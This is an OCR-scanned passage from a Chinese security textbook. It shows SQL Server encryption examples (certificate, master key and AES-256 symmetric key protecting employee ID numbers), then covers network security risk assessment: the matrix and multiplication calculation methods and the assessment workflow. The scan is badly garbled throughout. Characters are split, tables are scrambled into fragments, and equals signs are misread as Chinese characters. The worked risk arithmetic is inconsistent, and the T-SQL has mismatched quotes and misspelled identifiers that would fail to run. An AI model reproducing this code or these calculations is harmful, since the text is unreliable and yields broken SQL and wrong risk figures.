/ * START DATE 为 证 书生 效 日 期 ,默认 为 当前 日 期 ; EXPIRY DATE 为 证 书 过 期 日 期 , 若 不 加 指定 , 则 证 
书 从 当前 日 期 起 1 年 内 有 效 。* / 


【 例 14-10]. 为 SQL Server 实例 数据 库 AdventureWorks 创建 证 书 CertDemo ,密码 为 


DBSecurity2013 ,证 书 自 创 建 之 日 起 一 年 内 有 效 , 代 码 如 下 。 


USE AdventureWorks 

Go 

CREATE CERTIFICATE CertDemo 

ENCRYPTION BY PASSWORD = 'DBSecurity2013" 
WITH SUBJECT - 'CERT ENCRYPTION" 


2. 数据 加 密实 例 


各 级 密 钥 创建 好 之 后 ,还 需要 调用 SQL Server 的 系统 函数 来 最 终 实现 数据 的 加 解密 。 
对 于 采用 密 钥 或 证 书 加 密 ,SQL Server 提供 了 3 对 系统 函数 ,对 应 的 T-SQL 语句 名 
称 、 格 式 及 说 明 如 表 14-4 所 示 。 
表 14-4 SQL Server 数据 加 解密 系统 函数 
= 数 名 功能 格 x 说 — HB 
key_GUID 是 对 称 密 钥 在 数据 库 


EncryptByKey ( key _ GUID， 


EncryptByKey 密 钥 加 密 (plaintext "| @plaintext)) 中 的 ID 号 ,可 以 通过 系统 函数 
Key_GUID('key_name') 生 成 
DecryptByKey XP ER Ww; $H | DecryptByKey (key _ GUID, | 函数 返回 varbinary 类 型 的 数据 ， 
解密 ('ciphertext'|  ciphertext)) 需 经 过 转换 才能 正常 读 取 
非 对 称 密 钥 EncryptByAsymKey (asym _ | asym_key_ID 是 非 对 称 密 钥 在 数 
EncryptByAsymKey me key _ ID, ( ' plaintext ' | (2 | 据 库 中 的 ID 号 ,可 通过 系统 函数 
plaintext)) AsymKey. Id( 'key. name) 3k f 
DecryptByAsymKey (asym _ 
DecryptByAsymKey AER d key _ ID. ( ' ciphertext ' | @ | 同上 
nid ciphertext) ) 


tificate ID 为 i ID, n] 38 i3 
EncryptByCert(certificate ID. certificate ID 2o ie ku man 


EncryptByCert 证 书 加 密 Dai 入 系统 函数 Cert_ID( 'certificate_ 
ainte: aintext 
> i name 函数 产生 
DecryptByCert( certificate_ID, 
DexypyCer [iama | De BrCertCoertilicare ID» | py j 


U'ciphertext' | @ciphertext}) 


下 面 通过 一 个 实例 介绍 在 SQL Server 中 如 何 通过 对 称 密 钥 实现 数据 的 加 解密 。 

【 例 14-11]. 在 示例 数据 库 AdventureWorks 中 ,对 Employee 表 前 5 条 记录 的 社保 号 
码 NationalIDNumber 采用 对 称 密 钥 进行 加 密 ,以 证 书 加 密 该 密 钥 ,将 加 密 结果 及 对 应 的 雇 
员 号 码 保存 在 表 EncryptDemo 中 。 

实例 源码 如 下 。 


USE AdventureWorks 


Go 

/* 首先 创建 数据 库 主 密 钥 ,采用 密码 进行 保护 * / 
CREATE MASTER KEY 

ENCRYPTION BY PASSWORD = 'DBSecurity2013'; 

/ * 创建 证 书 CertDeno, 保护 对 称 密 钥 * / 

CREATE CERTIFICATE CertDemoNID 

WITH SUBJECT = 'Encrypt NationalIDNumber', 


实践 


EXPIRY DATE- '2015 - 12 - 31' 

/* 创建 对 称 密 钥 * / 

CREATE SYMMETRIC KEY SymDemoNID 

WITH ALGORITHM = AES 256 —— 以 AES 为 加 密 算法 ,加 密 强度 为 256 位 

ENCRYPTION BY CERTIFICATE CertDemoNID; 一 -使 用 证 书 CertDemo 加 密 密 钥 
/ * 打开 对 称 密 钥 * / 

OPEN SYMMETRIC KEY SymDemoNID 

DECRYPTION BY CERTIFICATE CertDemoNID; 

/ * 创建 表 EncryptDemo, 用 以 保存 加 密 数据 / 

CREATE TABLE dbo. EncryptDemo(EmployeeID int,NID encrypt varchar(50)); 

/ * 对 Employee 表 中 的 NationalIDNumber 字段 进行 加 密 * / 

INSERT INTO EncryptDemo (EmployeeID,NID encrypt) 

SELECT top 5 EnployeeID, EncryptByKey(Key GUID('SynDemoNID'), NationallDNunber) 
FROM HumanResources. Employee; 

/* 查看 加 密 结果 * / 

SELECT * 

FROM EncryptDemo; 

/* 查看 解密 结果 * / 

SELECT EmployeeID, NID encrypt = CONVERT(nvarchar(20),decryptbykey(NID encrypt)) 
FROM EncryptDemo; 

/ * 使 用 完毕 ,关闭 对 称 密 钥 * / 

CLOSE SYMMETRIC KEY SymDemoNID; 


上 述 源码 的 执行 结果 如 图 14-26 所 示 , 原 数据 经 过 加 密 函 数 作用 后 转变 为 二 进 制 格 式 ， 
故 显 示 为 乱码 ; 解密 之 后 加 密 数据 已 经 成 功 地 得 到 还 原 。 
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图 14-26 加 密 及 解密 结果 对 比 


【提示 】 如 果 采 用 非 对 称 密码 及 证 书 对 数据 进行 加 密 , 方 法 与 实例 类 似 , 只 需 对 照 
K 14-4 选用 对 应 的 加 解密 函数 即 可 。 
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D 网 络 安全 风险 评估 


近年 来 网 络 安全 风险 评估 渐渐 为 人 们 所 重视 ,不 少 大 型 企业 ,尤其 
营 商 、 金 融 业 都 请 专业 公司 进行 评估 。 本 章 对 国内 安全 风险 评估 操 
行 简单 说 明 ,并 介绍 简单 的 可 裁剪 、 易 操作 的 风险 评估 方法 。 


1 概述 
风险 评估 是 针对 确立 的 风险 管理 对 象 所 面临 的 风险 进行 识别 .解析 


价 。 先 通过 一 个 简单 的 例子 来 了 解 风险 评估 。 
假设 A 口袋 里 有 100 元 ,因为 打 睹 睡 ,被 小 偷偷 走 了 , 搞 得 晚上 设 


饭 吃 。 


用 风险 评估 的 观点 来 描述 这 个 案例 ,可 以 对 这 些 概 念 作 如 下 理解 。 
(1) 风险 三 钱 被 偷 走 。 

(2) 资产 =100 元 。 

(3) 影响 三 晚上 没 饭 吃 。 

(4) 威胁 三 小 偷 。 

(5) 弱点 (脆弱 性 ) = TREE, 

再 假设 , 某 证 券 公司 的 数据 库 服务 器 因为 存在 RPC DCOM 的 漏洞 ， 
入 侵 者 攻击 ,被 迫 中 断 3 天。 那么 很 容易 得 到 如 下 结论 。 

(1) 风险 = 服务 器 遭 到 入 侵 。 

(2) 资产 = 数据 库 服务 器 。 

(3) 影响 = 一 中 断 三 天 。 

CD 威胁 三 入 侵 者 。 

(5) 弱点 (脆弱 性 ) 二 RPC DCOM 漏洞 。 

以 上 通过 一 个 简单 的 例子 就 可 以 知道 风险 评估 主要 做 的 工作 , 进 一 
纳 风 险 评 估 要 做 的 主要 工作 如 下 。 

评估 前 的 准备 工作 ,包括 制订 风险 评估 计划 、 确 定 风险 评估 程序 、 
选择 风险 评估 方法 和 工具 等 。 

识别 需要 保护 的 资产 、 面 临 的 威胁 和 存在 的 脆弱 性 。 

在 确认 已 有 安全 措施 的 基础 上 ,分 析 威 胁 源 的 动机 、 威 胁 行为 的 
能 力 、 脆 弱 性 的 被 利用 性 ,资产 的 价值 和 影响 的 程度 。 

分 别 对 上 述 五 个 方面 的 分 析 结 果 进 行 评 价 , 给 出 相应 的 等 级 划 
分 .然后 综合 计算 这 五 个 方面 的 评价 结果 ,最 后 得 出 风险 的 等 级 。 


实践 


15.2 国内 现 有 风险 评估 机 构 


普 华 永 道 , 毕 马 威 等 会 计 师 事务 所 类 型 的 公司 的 整个 审计 体系 涵盖 了 网 络 安全 评估 。 
国内 外 较 有 实力 的 网 络 安全 公司 包括 较 早 提出 安全 评估 并 且 在 运营 商 市 场 有 比较 好 的 实践 
的 安 氏 、 启 明星 展 、 绿 盟 科 技 、 亿 阳 信 通 等 。 

中 国信 息 安全 测评 中 心 ( 以 下 简称 测评 中 心 ) 是 我 国 专门 从 事 信息 技术 安全 测试 和 风险 
评估 的 权威 职能 机 构 ,在 负责 党 政 机 关 信 息 网 络 .重要 信息 系统 的 安全 风险 评估 的 同时 ,也 
开展 信息 技术 产品 ,系统 和 工程 建设 的 安全 性 测试 与 评估 等 工作 。 


15.3 常用 风险 评估 方法 
15.3.1 风险 计算 矩阵 法 


1. 概念 


矩阵 法 主要 适用 于 由 两 个 要 素 值 确定 一 个 要 素 值 的 情形 。 在 风险 值 计算 中 ,通常 需要 
对 两 个 要 素 确定 的 另 一 个 要 素 值 进行 计算 ,例如 由 威胁 和 脆弱 性 确定 安全 事件 发 生 可 能 性 
值 . 由 资产 和 脆弱 性 确定 安全 事件 的 损失 值 等 ,同时 需要 整体 掌握 风险 值 的 确定 值 , 因 此 拢 
阵 法 在 风险 分 析 中 得 到 广泛 采用 。 

矩阵 要 素 定义 为 > 二/(z,y)。 函 数 /采用 和 矩阵 形式 表示 。 以 要 素 x 和 要 素 y 的 取 值 
构建 一 个 二 维 矩 阵 ,矩阵 内 m Xn 个 值 即 为 要 素 < 的 取 值 ,如 表 15-1 所 示 。 


表 15-1 要 素 取 值 
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首先 需要 确定 二 维 计算 矩阵 ,矩阵 内 各 个 要 素 的 值 根据 具体 情况 和 函数 递增 情况 采用 数 
学 方法 确定 ,然后 将 两 个 元 素 的 值 在 矩阵 中 进行 比 对 ,行列 交叉 处 即 为 所 确定 的 计算 结果 。 

和 矩阵 的 计算 需要 根据 实际 情况 确定 ,矩阵 内 值 的 计算 不 一 定 遵循 统一 的 计算 公式 ,但 必 
须 具 有 统一 的 增 减 趋势 , 即 如 果 是 递增 函数 ,= 值 应 随 着 z 与 > 的 值 递增 。 

矩阵 法 通过 构造 两 两 要 素 计算 矩阵 清晰 罗列 要 素 的 变化 趋势 ,具备 良好 的 灵活 性 。 风 
险 计算 矩阵 法 计算 过 程 如 下 。 

D 计算 安全 事件 发 生 可 能 性 。 

O 计算 安全 事件 造成 的 损失 。 


© 计算 风险 值 。 
OD 结果 判定 。 


2. 假设 前 提 


风险 计算 矩阵 法 先 做 如 下 假设 。 

假设 1: 资产 假设 。 共 有 3 个 重要 资产 ,资产 Al 资产 A2 和 资产 A3; 资产 价值 分 别 是 
资产 A1—2, 90" A2 王 3、 资产 A3—5; 

假设 2: 威胁 假设 。 资产 Al 面临 两 个 主要 威胁 ,威胁 Tl 和 威胁 T2; 资产 A2 面临 一 
个 主要 威胁 ,威胁 T3; 资产 A3 面临 两 个 主要 威胁 ,威胁 TA 和 T5; 威胁 发 生 频率 分 别 是 威 
W T1=2 、 威 肋 T2=1、 威 胁 T3=2、 威 胁 T4==5、 威 胁 T5—4; 

假设 3: 弱点 假设 (或 脆弱 性 假设 ) ,如 下 。 

。 威胁 Tl 可 以 利用 的 资产 Al 存在 两 个 脆弱 性 ,脆弱 性 V1 和 脆弱 性 V2。 

* 威胁 T2 可 以 利用 的 资产 Al 存在 3 个 脆弱 性 ,脆弱 性 V3、 脆 弱 性 VA 和 脆弱 性 V5。 

。 威胁 T3 可 以 利用 的 资产 A2 存在 的 两 个 脆弱 性 ,脆弱 性 Vo 和 脆弱 性 V7。 

。 威 胁 T4 可 以 利用 的 资产 A3 存在 一 个 脆弱 性 ,脆弱 性 V8。 

。 威 胁 T5 可 以 利用 的 资产 A3 存在 一 个 脆弱 性 ,脆弱 性 V9。 

脆弱 性 严重 程度 分 别 是 脆弱 性 V1 二 2、 上 脆弱 性 V2—3. Mess TE V3 二 1、 脆 弱 性 V4 二 4、 脆 
弱 性 V5—2 .脆弱 性 V6==4、 脆 弱 性 V7=2、 脆 弱 性 V8 二 3 脆弱 性 V9 二 5。 


3. 计算 过 程 


在 以 上 假设 前 提 下 ,具体 计算 过 程 如 下 。 
CD 计算 安全 事件 发 生 可 能 性 ,步骤 如 下 。 
CD 构建 安全 事件 发 生 可 能 性 矩阵 ,如 表 15-2 所 示 。 


表 15-2 威胁 发 生 可 能 性 
脆弱 性 严重 程度 
威胁 发 生 频率 
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© 根据 威胁 发 生 频 率 值 和 脆弱 性 严重 程度 值 在 矩阵 中 进行 对 照 , 确 定安 全 事件 发 生 可 
能 性 值 。 
© 对 计算 得 到 的 安全 风险 事件 发 生 可 能 性 进行 等 级 划分 ,如 图 15-3 所 示 。 
表 15-3 划分 等 级 
安全 事件 发 生 可 能 性 值 1~5 6~11 12~16 17~21 22~25 
发 生 可 能 性 等 级 1 2 3 4 5 


实践 


(2) 计算 安全 事件 的 损失 ,步骤 如 下 。 
(D 构建 安全 事件 损失 矩阵 ,如 表 15-4 所 示 。 


masa ”安全 事件 损失 和 矩阵 取 值 


脆弱 性 严重 程度 
资产 价值 


1 


2 
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@ 根据 资产 价值 和 脆弱 性 严重 程度 值 在 矩阵 中 进行 对 照 ,确定 安全 事件 损失 值 ; 
© 对 计算 得 到 的 安全 事件 损失 进行 等 级 划分 ,如 表 15-5 所 示 。 


mass 划分 等 级 


安全 事件 损失 值 1-5 


6—10 


11-16 


16—20 


21—25 


安全 事件 损失 等 级 1 


(3) 计算 风险 值 ,步骤 如 下 。 


CD 构建 风险 矩阵 ,如 表 15-6 所 示 。 
表 15-6 ”风险 矩阵 取 值 


可 能 性 
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损失 
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© 根据 安全 事件 发 生 可 能 性 和 安全 事件 损失 在 矩阵 中 进行 对 照 ,确定 安全 事件 风险 。 
(4) 风险 结果 判定 。 根 据 预 设 的 等 级 划分 规则 判定 风险 结果 ,如 表 15-7 所 示 。 以 此 类 
推 ,得 到 所 有 重要 资产 的 风险 值 ,并 根据 风险 等 级 划分 表 , 确 定 风 险 等 级 。 


表 15-7 结果 判定 


风险 值 1~6 


7—12 


13—18 


19 一 23 


24 一 25 


风险 等 级 1 


2 
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15.3.2 风险 计算 相 乘 法 


相 乘法 描述 表达 式 为 >= 二 f(z,y) 二 x@y 当 了 为 增 量 函数 时 ,可 以 为 直接 相 乘 ,也 可 


以 为 相 乘 后 取 模 等 。 


相 乘 法 简单 明确 ,直接 按照 统一 公式 计算 , 即 可 得 到 所 需 结 果 。 因 此 相 乘法 在 风险 分 析 


中 也 得 到 广泛 采用 。 
1. 假设 前 提 


风险 计算 相 乘 法 先 做 如 下 假设 。 

假设 1: 资产 假设 。 共 有 两 个 重要 资产 ,资产 Al 和 资产 A2; 资产 价值 分 别 是 资产 
Al 一 4 资产 A2 一 5。 

假设 2: 威胁 假设 资产 Al 面临 3 个 主要 威胁 ,威胁 T1、 威 胁 T2 和 威胁 T3; 资产 A2 
面临 两 个 主要 威胁 ,威胁 T4 和 威胁 T5; 威胁 发 生 频率 分 别 是 威胁 T= 1. LI T2 — 5 Jc 
胁 T3=4\ 威 胁 T4=3、 威 胁 T5—4. 

假设 3: 弱点 (脆弱 性 ) 假 设 如 下 。 

。 威胁 T1 可 以 利用 的 资产 Al 存在 一 个 脆弱 性 ,脆弱 性 V1。 

。 威胁 T2 可 以 利用 的 资产 Al 存在 两 个 脆弱 性 ,脆弱 性 V2、 脆 弱 性 V3。 

。 威胁 T3 可 以 利用 的 资产 Al 存在 一 个 脆弱 性 ,脆弱 性 V4。 

。 威胁 TA 可 以 利用 的 资产 A2 存在 一 个 脆弱 性 ,脆弱 性 V5。 

。 威胁 T5 可 以 利用 的 资产 A2 存在 一 个 脆弱 性 ,脆弱 性 V6。 

脆弱 性 严重 程度 分 别 是 脆弱 性 V1 二 3、 脆 弱 性 V2 二 1、 脆 弱 性 V3 王 5 脆弱 性 V4 二 4、 脆 
dE V5 二 4\ 脆 弱 性 V6—3. 


2. 计算 过 程 


在 以 上 假设 前 提 下 ,以 资产 Al 面临 的 威胁 TY 可 以 利用 的 脆弱 性 V1 为 例 ,计算 安全 
风险 值 ,计算 公式 使 用 <==/(z,y) 王 VzXy ,具体 计算 过 程 如 下 。 

CD 计算 安全 事件 发 生 可 能 性 一 威胁 发 生 频率 值 @@ 脆 弱 性 严重 程度 值 。 

° 威胁 发 生 频 率 : 威胁 T1=1. 

° 脆弱 性 严重 程度 : 脆弱 性 V1—3. 

。 安全 事件 发 生 可 能 性 二 V1X3 二 V3。 

D 计算 安全 事件 的 损失 二 资产 价值 @@ 脆 弱 性 严重 程度 值 。 

t 资产 价值 : 资产 Al 一 4。 

t 脆弱 性 严重 程度 : 脆弱 性 V1—3. 

。 计算 安全 事件 的 损失 ,安全 事件 损失 = V4X4 二 V12。 

@ 计算 风险 值 三 安全 事件 发 生 可 能 性 @ 安 全 事件 损失 。 

。 安全 事件 发 生 可 能 性 一 2 。 

| 安全 事件 损失 一 3。 

° 安全 事件 风险 值 =V3 X V12 一 6。 

@ 确定 风险 等 级 ,如 表 15-8 所 示 。 


表 15-8 风险 等 级 
风险 值 1~5 6~10 11~15 16~20 21~25 
风险 等 级 1 2 3 4 5 


实践 


15.4 风险 评估 流程 


风险 评估 的 过 程 包括 风险 评估 准备 .风险 因素 识别 .风险 程度 分 析 和 风险 等 级 评价 4 个 
子 阶段 。 在 信息 安全 风险 管理 过 程 中 ,接收 对 象 确立 的 输出 ,为 风险 控制 提供 输入 ,监控 与 
审查 、 沟 通 与 咨询 贯穿 此 四 个 阶段 。 


15.4.1 风险 评估 准备 工作 


1. 确定 目标 


根据 组 织 的 业务 战略 以 及 有 关 法 律 .法规 和 文件 精神 等 ,确定 此 次 风险 评估 要 达到 的 目 
标 是 什么 。 


2. 确定 范围 


风险 评估 的 范围 可 能 是 组 织 全 部 的 信息 及 与 信息 处 理 相关 的 各 类 资产 、 管 理 机 构 , 也 可 
能 是 组 织 所 属 的 一 个 或 几 个 机 构 或 子 部 门 。 


3. 组 建 团 队 


风险 评估 实施 团队 是 由 管理 层 、 信 息 安全 人 员 IT 技术 等 人 员 组 成 的 风险 评估 小 组 。 
必要 时 ,可 组 建 由 评估 方 、 被 评估 方 领导 和 相关 部 门 负责 人 参加 的 风险 评估 领导 小 组 ,聘请 
相关 专业 的 技术 专家 和 技术 骨干 组 成 专家 小 组 。 

评估 实施 团队 应 做 好 评估 前 的 表格 .文档 \ 检 测 工具 等 各 项 准备 工作 ,进行 风险 评估 技 
术 培 训 和 保密 教育 ,制定 风险 评估 过 程 管理 相关 规定 。 根 据 被 评估 方 要 求 , 双 方 可 签署 保密 
合同 , 视 情 签署 个 人 保密 协议 。 本 公司 风险 评估 实施 团队 一 般 采用 评估 方 与 被 评估 方 协作 
方式 组 建 评估 小 组 。 

。 风险 评估 小 组 组 长 1 一 2 名 (被 评估 方 项 目 负 责 人 ) 。 

。 风险 评估 小 组 副 组 长 1 名 (评估 方 项 目 负 责 人 ) 。 

* 风险 评估 小 组 协调 员 2 一 4 名 (评估 方 与 被 评估 方 项 目 负责 人 分 别 指定 协调 员 ) 。 

。 风险 评估 小 组 评估 人 员 4 名 (根据 具体 项 目 可 进行 调整 ) 。 

信息 安全 风险 管理 相关 人 员 的 角色 和 责任 如 表 15-9 所 示 。 


表 15-9 信息 安全 风险 管理 相关 人 员 的 角色 和 责任 


ix 信息 系统 信息 安全 风险 管理 
角色 | 内 外 部 # 任 角色 | 内 外 部 责 E 
决策 层 | 主管 者 | 内 ”| 负责 信息 系统 的 重大 决策 | 主管 者 | 内 rici asna 


负责 信息 系统 的 规划 ,以 负责 信息 安全 风险 管理 的 规 
管理 层 | 管理 者 | 内 及 建设 .运行 .维护 和 监控 | 管理 者 | 内 划 , 以 及 实施 和 监控 过 程 中 的 
等 方面 的 机 构 和 协调 机 构 和 协调 


续 表 


ru 信息 系统 信息 安全 风险 管理 
角色 | 内 外 部 La: 角色 | 内 外 部 Ro 
建设 者 | 内 或 外 aA 7 
运行 着 | 内 负责 信息 系统 的 日 常 运行 执行 者 | 内 或 外 负责 信息 安全 风险 管理 的 
执行 层 和 操作 实施 
维护 者 | 内 或 外 负责 信息 系统 的 日 常 维 
护 , 包 括 维修 和 升级 
负责 信息 系统 的 监视 和 负责 信息 安全 风险 管理 过 程 、 
MEFA 控制 mais ls 成 本 和 结果 的 监视 和 控制 
为 信息 系统 提供 专业 咨 为 信息 安全 风险 管理 提供 专 
支持 层 | 专业 者 | 外 询 , 培 训 、 诊 断 和 工具 等 | 专业 者 | 外 业 咨 询 、 培 训 、 诊 断 和 工具 等 
服务 服务 
用 户 层 | 使 用 者 | 内 或 外 ee 受益 者 | 内 或 外 n m 


4. 系统 调研 


系统 调研 是 确定 被 评估 对 象 的 过 程 ,风险 评估 小 组 应 进行 充分 的 系统 调研 ,为 风险 评估 
依据 和 方法 的 选择 ,评估 内 容 的 实施 奠定 基础 。 调 研 内 容 至 少 应 包括 如 下 几 项 。 

。 评 估 单 位 基本 情况 。 

。 安全 保密 基本 要 求 。 

。 物理 安全 。 

运行 安全 。 

信息 安全 保密 。 

。 其 他 。 

系统 调研 可 以 采取 问卷 调查 、 现 场面 谈 相 结 合 的 方式 进行 。 调 查 问卷 是 提供 一 套 关 于 
管理 或 操作 控制 的 问题 表格 , 供 系 统 技术 或 管理 人 员 填 写 ; 现场 面谈 则 是 由 评估 人 员 到 现 


场 观察 并 收集 系统 在 物理 、 环 境 和 操作 方面 的 信息 。 


5. 确定 依据 


根据 系统 调研 结果 ,确定 评估 依据 和 评估 方法 。 评 估 依 据 ( 但 不 仅 限 于 ) 如 下 。 

。 现 有 国际 标准 、 国 家 标准 ` 行 为 标准 。 

* 行业 主管 机 关 的 业务 系统 的 要 求 和 制度 。 

系统 安全 保护 等 级 要 求 。 

t 系统 互联 单位 的 安全 要 求 。 

。 系统 本 身 的 实时 性 或 性 能 要 求 等 。 

根据 评估 依据 ,应 考虑 评估 的 目的 范围. 时间、 效果 、 人 员 素 质 等 因素 来 选择 具体 的 风 
险 计算 方法 ,并 依据 业务 实施 对 系统 安全 运行 的 需求 ,确定 相关 的 判断 依据 ,使 之 能 够 与 组 


织 环 境 和 安全 要 求 相 适应 。 


实践 


6. 制订 方案 


风险 评估 方案 的 目的 是 为 后 面 的 风险 评估 实施 活动 提供 一 个 总 体 计划 ,用 于 指导 实施 
方 开展 后 续 工 作 。 风 险 评估 方案 的 内 容 一 般 包括 (但 不 限于 ) 如 下 几 项 。 
。， 团 队 组 织 : 包括 评估 团队 成 员 、 组 织 结构 、 角 色 、 责 任 等 内 容 。 
。 工 作 计划 : 风险 评估 各 阶段 的 工作 计划 ,包括 工作 内 容 、 工 作 形式 、 工 作成 果 等 
内 容 。 
* 时 间 进 度 安排 : 项 目 实施 的 时 间 进 度 安排 。 
7. 获得 支持 


上 述 所 有 内 容 确 定 后 ,应 形成 较为 完整 的 风险 评估 实施 方案 ,得 到 组 织 最 高 管理 者 的 支 
持 、 批 准 ; 对 管理 层 和 技术 人 员 进 行 传达 ,在 组 织 范围 就 风险 评估 相关 内 容 进行 培训 ,以 
明确 有 关 人 员 在 风险 评估 中 的 任务 ,如 表 15-10 所 示 为 风险 评估 过 程 中 的 输出 文档 及 其 
内 容 。 

表 15-10 风险 评估 过 程 的 输出 文档 及 其 内 容 


5 & 输出 文档 文档 内 容 
《风险 评估 计划 书 》 风险 评估 的 目的 、 意 义 \ 范 围 . 目 标 ` 组 织 结构 、 经 
风险 评估 准备 费 预算 和 进度 安排 等 
《风险 评估 程序 》 风险 评估 的 工作 流程 .输入 数据 和 输出 结果 等 
《人 选 风险 评估 方法 和 工具 列表 》 | 合适 的 风险 评估 方法 和 工具 类 别 


15.4.2 项 目 启动 


召开 项 目 启动 会 议 ,评估 方向 被 评估 方 介绍 风险 评估 流程 及 评估 组 人 员 职 责 , 项 目 
启动 。 


15.4.3 风险 因素 识别 


1. 识别 需要 保护 的 资产 


依据 (系统 调研 报告 ?识别 对 机 构 使 命 具 有 关键 和 重要 作用 的 需要 保护 资产 ,形成 (需要 
保护 的 资产 清单 》。 


2. 识别 面临 的 威胁 


依据 (系统 调研 报告 ) 参 照 威胁 库 , 识 别 机 构 的 信息 资产 面临 的 威胁 ,形成 (面临 的 威胁 
列表 》。 


3. 识别 存在 的 脆弱 性 
依据 (系统 调研 报告 ) 参 照 漏洞 库 , 识 别 机构 的 信息 资产 存在 的 脆弱 性 ,形成 (存在 的 脆 


弱 性 列表 》。 
4. 风险 因素 的 识别 方式 


风险 因素 的 识别 方式 包括 文档 审查 \ 人 员 访 谈 、 现 场 考察 及 辅助 工具 等 多 种 形式 ,可 以 
根据 实际 情况 灵活 采用 和 结合 使 用 。 

° 问卷 : 分 发 问卷 给 被 评估 单位 的 工作 人 员 。 

° 访谈 : 跟 被 评估 单位 的 领导 、 部 门 负责 人 、 技 术 人 员 面 谈 。 

。 查阅 文档 : 查阅 被 评估 单位 信息 安全 方面 和 保密 工作 方面 的 文档 ,如 表 15-11 所 示 。 

。 辅助 工具 : 利用 专业 检查 工具 对 信息 安全 系统 进行 检查 检测 。 


表 15-11 风险 因素 识别 过 程 的 输出 文档 及 其 内 容 


阶段 输出 文档 文档 内 容 
《需要 保护 的 资产 清单 》 对 机 构 使 命 具有 关键 和 重要 作用 的 需要 保护 的 资产 清单 
风险 因素 识别 |《 面 临 的 威胁 列表 》 机 构 的 信息 资产 面临 的 威胁 列表 
《存在 的 脆弱 性 列表 》 机 构 的 信息 资产 存在 的 脆弱 性 列表 


15.4.4 风险 程度 分 析 


1. 确认 已 有 的 安全 措施 


依据 (系统 调研 报告 确认 已 有 的 安全 措施 ,包括 技术 层面 ( 即 物理 平台 、 系 统 平台 通信 
平台 、 网 络 平台 和 应 用 平台 ) 的 安全 功能 、 组 织 层面 ( 即 结构 .岗位 和 人 员 ) 的 安全 控制 和 管理 
层面 ( 即 策略 ,规章 和 制度 ) 的 安全 对 策 , 形 成 (已 有 安全 措施 分 析 报 告 》。 


2. 分 析 威 胁 源 的 动机 


依据 (系统 调研 报告 和 《面临 的 威胁 列表 》, 从 利益 、 复 仇 、 好 奇 和 自负 等 驱使 因素 ,分析 
威胁 源 动机 的 强 弱 ,形成 (威胁 源 分 析 报 告 》。 


3. 分 析 威 胁 行为 的 能 力 


依据 (系统 调研 报告 和 《面临 的 威胁 列表 》, 从 攻击 的 强度 、 广 度 、 速 度 和 深度 等 方面 ,分 
析 威 胁 行为 能 力 的 高 低 ,形成 (威胁 行为 分 析 报 告 》。 


4. 分 析 脆 弱 性 的 被 利用 性 


依据 4 系统 调研 报告 《面临 的 威胁 列表 》 和 《存在 的 脆弱 性 列表 》, 按 威胁 /脆弱 性 分 析 
脆弱 性 被 威胁 利用 的 难 易 程 度 , 形 成 (脆弱 性 分 析 报 告 》。 


5. 分 析 资 产 的 价值 


依据 《系统 调研 报告 和 《需要 保护 的 资产 清单 ), 从 敏感 性 、 关 键 性 和 昂贵 性 等 方面 ,分 
析 资 产 价值 的 大 小 ,形成 (资产 价值 分 析 报 告 》。 


实践 


6. 分 析 影 响 的 程度 


依据 (系统 调研 报告 和 《需要 保护 的 资产 清单 ), 从 资产 损失 、 使 命 妨碍 和 人 员 伤 亡 等 方 
面 ,分 析 影 响 程度 的 深浅 ,形成 (影响 程度 分 析 报 告 》。 
如 表 15-12 所 示 为 风险 程度 分 析 过 程 中 的 输出 文档 及 其 内 容 。 


表 15-12 风险 程度 分 析 过 程 的 输出 文档 及 其 内 容 


"n" R 输出 文档 文档 内 容 

确认 已 有 的 安全 措施 ,包括 技术 层面 ( 即 物理 平台 、 系 统 平台 、 通 
《已 有 安全 措施 分 析 | 信 平 台 、 网 络 平台 和 应 用 平台 ) 的 安全 功能 、 组 织 层面 ( 即 结构 、 岗 
报告 》 位 和 人 员 ) 的 安全 控制 和 管理 层面 ( 即 策略 、 规 章 和 制度 ) 的 安全 
对 策 

风险 程度 分 析 |《 威 胁 源 分 析 报告 》 | 从 利益 复仇 ,好奇 和 自负 等 驱使 因素 分 析 威 胁 源 动机 的 强 弱 
《威胁 行为 分 析 报 告 》| 从 攻击 的 强度 .广度 .速度 和 深度 等 方面 分 析 威 胁 行为 能 力 的 高 低 
《脆弱 性 分 析 报告 》 — | 按 威胁 /脆弱 性 分 析 脆 弱 性 被 威胁 利用 的 难 易 程度 
《资产 价值 分 析 报 告 》| 从 敏感 性 ,关键 性 和 昂贵 性 等 方面 分 析 资产 价值 的 大 小 
《影响 程度 分 析 报 告 》| 从 资产 损失 、 使 命 妨 碍 和 人 员 伤 亡 等 方面 分 析 影响 程度 的 深浅 


15.4.5 风险 等 级 评价 


1. 评价 威胁 源 动机 的 等 级 

依据 (威胁 源 分 析 报 告 》 给 出 威胁 源 动机 的 等 级 ,形成 (威胁 源 等 级 列表 》。 
2. 评价 威胁 行为 能 力 的 等 级 

依据 (威胁 行为 分 析 报 告 》, 给 出 威胁 行为 能 力 的 等 级 ,形成 (威胁 行为 等 级 列表 》。 
3. 评价 脆弱 性 被 利用 的 等 级 

依据 (脆弱 性 分 析 报 告 》, 给 出 脆弱 性 被 利用 的 等 级 ,形成 (脆弱 性 等 级 类 别 》。 
4. 评价 资产 价值 的 等 级 

依据 (资产 价值 分 析 报 告 ), 给 出 资产 价值 的 等 级 ,形成 (资产 价值 等 级 列表 》。 
5. 评价 影响 程度 的 等 级 

依据 (影响 程度 分 析 报 告 ), 给 出 影响 程度 的 等 级 ,形成 (影响 程度 等 级 列表 》。 
6. 综合 评价 风险 的 等 级 


汇总 上 述 分 析 报 告 和 等 级 列表 ,从 风险 评估 算法 库 中 选择 合适 的 风险 评估 算法 ,综合 评 
价 风险 的 等 级 ,形成 (风险 评估 报告 ?。 风 险 评估 算法 库 是 各 种 风险 评估 算法 的 汇集 ,包括 公 
认 算 法 和 自 创 算法 。 

评价 等 级 级 数 可 以 根据 评价 对 象 的 特性 和 实际 评估 的 需要 而 定 ,如 (高 .中 、 低 ) 三 级 ， 


(很 高 . 较 高 .中 等 、 较 低 、 很 低 ) 五 级 等 。 表 15-13 所 示 为 风险 等 级 评价 过 程 中 的 输出 文档 及 


其 内 容 。 
表 15-13 风险 等 级 评价 过 程 的 输出 文档 及 其 内 容 
" & 输出 文档 文档 内 容 
《威胁 源 等 级 列表 》 威胁 源 动机 的 等 级 列表 
《威胁 行为 等 级 列表 ) | 威胁 行为 能 力 的 等 级 列表 
《 胸 习 性 等 级 列表 ) | 脆弱 性 被 利用 的 等 级 列表 
风险 等 级 评价 。 |《 资 产 价值 等 级 列表 ) | 资产 价值 的 等 级 列表 
《影响 程度 等 级 列表 ) | 影响 程度 的 等 级 列表 
